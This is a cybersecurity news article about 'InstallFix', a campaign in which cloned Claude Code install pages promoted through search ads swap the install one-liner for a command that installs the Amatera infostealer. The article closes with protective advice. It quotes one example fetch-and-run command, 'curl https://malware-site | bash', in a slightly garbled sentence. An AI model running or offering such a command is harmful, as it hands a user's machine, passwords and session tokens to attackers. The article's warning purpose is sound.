Fake Claude Code Installers Target Windows and macOS Users with Infostealers
Imagine searching for a handy AI coding tool like Claude Code, spotting a top search result, and copying a quick “one-liner” command to install it, only to have attackers have cloned the page and swapped that command for malware. This sneaky tactic, known as InstallFix, is hitting Windows and macOS users hard, stealing passwords, cookies, and access to developer tools.
Cybercriminals clone install pages for popular tools like Claude Code, making fake sites that look identical to the real ones. They keep the logos, sidebars, and text the same, but change the install command’s URL to point to their malware server.
Modern guides often push simple commandsthat aree curl https://malware-site | basheasy to copy-paste into your terminal. With administrative privileges, the script gives you full admin powers on your machine, turning a trusted-looking website into a remote control.
Researchers at Push Security spotted this in action. Users googling “Claude Code install” or “Claude Code CLI” click sponsored ads leading to these clones. The fake page has a shiny “copy” button next to the command. Click on other links? They redirect to the real site, so nothing seems off. It’s like a wolf in sheep’s clothing, familiar and non-threatening.
This builds on ClickFix attacks, where users “fix” fake errors by running malware. Here, it’s InstallFix: you infect your own device thinking you’re grabbing a legit tool.
The star payload? Amatera infostealer. It grabs browser data, including saved passwords, cookies, session tokens, autofill info, and system details to profile your device. Attackers use this to hijack sessions and log in to cloud dashboards or admin panels without your password. Reports also flag interest in crypto wallets.
The campaign hits both platforms. On macOS, the one-liner fetches a base64-obfuscated script from an attacker’s domain. That downloads a binary, strips its attributes, makes it executable, and runs it quietly. On Windows, it spawns cmd.exe, then mshta.exe with a remote URL running as a trusted Microsoft process, not some shady exe. No pop-ups or alerts; you think the install worked, but the stealer lurks in the background, said by Malwarebytes.
Non-expert users new to AI dev tools fall hardest. They trust the domain without checking, especially when it’s from the top search results. But trust no one, unquestioningly verify everything.
How Attackers Pull It Off: A Simple Breakdown
- Clone and Bait: Copy real docs, add sponsored ads.
- One-Liner Trap: Swap URL to malware host.
- Payload Drop: Infostealer like Amatera steals credentials.
- Stealth Exit: Redirects keep suspicion low.
Stay Safe from InstallFix and Infostealer Attacks
Don’t let haste hand over your data. Here’s how to protect yourself:
- Slow Down and Verify: Pause before pasting commands. Read what it does. Does it fetch from a sketchy URL? Check official docs or support first.
- Ditch Copy-Paste Blindly: Type commands manually to spot hidden tricks.
- Trust Only Known Sources: Stick to verified sites, such as the tool’s GitHub or homepage. Avoid search ads.
- Lock Down Devices: Run real-time anti-malware and web protection. Keep OS and browsers updated.
- Spot the Signs: Watch for base64 gobbledygook or
mshta.exespikes in Task Manager.
These attacks evolve fast.. ClickFix recently added NSLookup tricks. Stay vigilant by following threat intel blogs. Tools like Claude Code are game-changers for devs, but safety first. Verify, protect, and code on.
Site: cybersecuritypath.com
About the Author
